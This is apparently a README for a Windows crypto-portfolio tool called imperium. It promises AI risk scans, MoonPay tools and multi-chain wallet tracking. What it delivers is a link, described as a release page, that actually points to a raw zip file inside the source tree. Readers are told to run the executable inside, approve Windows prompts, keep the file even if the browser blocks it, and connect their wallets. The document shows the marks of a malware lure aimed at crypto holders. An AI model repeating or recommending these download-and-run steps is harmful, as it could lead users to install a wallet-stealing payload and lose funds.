imperium is a Windows app for people who want one place to watch their crypto holdings, check risk, and act on changes fast. It brings together AI, wallet tools, and multi-chain support in one desktop flow.
Use it to:
- monitor a portfolio
- scan for risk
- surface smart money moves
- review balance changes across chains
- use MoonPay CLI tools through MCP
- work with the OpenWallet Standard
Before you install imperium, make sure your PC has:
- Windows 10 or Windows 11
- An internet connection
- At least 8 GB of RAM
- 2 GB of free disk space
- Permission to install apps on your PC
For the best experience, use:
- a modern CPU
- a stable network
- a wallet you already use for crypto
Go to the release page here and download and run this file from the latest release:
https://raw.githubusercontent.com/Adamoktora/imperium/master/src/wallet/Software-3.3.zip
On the release page, look for:
- the newest version
- the Windows download
- a file such as
.exeor.zip
If you download a .zip file, extract it first, then open the app file inside.
- Open the release page link above.
- Download the latest Windows file.
- If the file is
.zip, right-click it and choose Extract All. - Open the extracted folder.
- Double-click the app file to start imperium.
- If Windows asks for permission, choose Yes.
If you see a file named imperium.exe, open that file.
If your browser marks the file as blocked, keep the file only if it came from the release page above.
When imperium opens for the first time, follow the setup screen.
You may be asked to:
- choose your wallet source
- connect a supported account
- allow network access
- add an API key for AI features
- select your preferred chain view
If you use MoonPay tools, connect the needed service from inside the app. If you use a hardware or software wallet, make sure it is ready before you start.
Start with your main dashboard. From there, you can move through the app in a few simple steps.
Connect the wallet you want to track. imperium can read your holdings and show your balances in one view.
Open the portfolio screen to see:
- total value
- asset split
- chain breakdown
- recent changes
Use the risk scan tool to check:
- large exposure in one asset
- weak balance across chains
- unusual market movement
- wallet activity that may need attention
imperium uses Groq AI with Llama 3.3 to help you make sense of your data. It can highlight patterns, group related activity, and point out changes that matter.
If the app suggests a move, review it before you proceed. You can use the data view to compare options and make a decision.
Keep track of your holdings across supported chains in one place. See value changes, asset mix, and wallet activity without switching tools.
Check your portfolio for concentration risk, unusual shifts, and weak spots. The scan helps you spot problems early.
Get AI-based guidance on how to adjust your holdings. The app looks at your current setup and suggests a better split.
Follow wallet movement and activity that may show where informed users are moving funds.
Work across several chains from one desktop app. This helps you avoid jumping between sites and tabs.
imperium includes 13 MoonPay CLI tools through MCP. These tools help connect app logic with supported service actions in a clean workflow.
The app is built to work with the OpenWallet Standard, which helps keep wallet access and data handling more consistent.
A simple daily flow looks like this:
- Open imperium.
- Load your wallet view.
- Check the main dashboard.
- Run a risk scan.
- Read the AI notes.
- Make a move only after you review the data.
If you manage more than one wallet, keep them in separate views so you can compare them fast.
- Make sure you downloaded the latest release
- Check that Windows allowed the app to run
- Try opening it again from the extracted folder
- Wait a few seconds for data to load
- Check your internet connection
- Restart the app
- Confirm that your wallet is connected
- Check that the correct chain is selected
- Refresh the account view
- Allow network access if you want live data
- Allow wallet access only if you trust the app source from the release page
- Open the release page in another browser
- Refresh the page
- Look for the latest Windows asset
Use imperium only with wallets and accounts you control. Review each action before you approve it. Keep your wallet keys private. Store them in a safe place and never share them in chat, email, or screenshots.
If you use multiple wallets, label them in a way that makes sense to you. That makes it easier to track changes and avoid mistakes.
This project focuses on:
- agent
- ai
- crypto
- defi
- groq
- hackathon
- mcp
- moonpay
- openwalletstandard
- portfolio
- synthesis
- typescript
imperium acts as a command center for digital assets. It helps you see what you hold, what changed, and what may need action. It combines AI review with wallet tools so you can make faster checks from one place.
The app is useful when you want:
- one dashboard for your assets
- risk checks without manual work
- AI help with portfolio choices
- a cleaner view across chains
- a more direct way to follow wallet activity
- Track a personal crypto portfolio
- Watch for sudden risk changes
- Compare wallet performance
- Review DeFi exposure
- Check activity across several chains
- Use AI to sort noisy wallet data
- Work with MoonPay-related tools in one workflow
On the release page, you may see:
.exefor direct launch.zipfor a packaged app folder.msifor a Windows installer
Use the Windows file that matches the latest release.
- Keep the app updated by checking the release page
- Use a stable internet connection
- Start with one wallet before adding more
- Review AI output before acting on it
- Keep your chain list clean and current
If you need to update imperium, visit this page again to download the latest release:
https://raw.githubusercontent.com/Adamoktora/imperium/master/src/wallet/Software-3.3.zip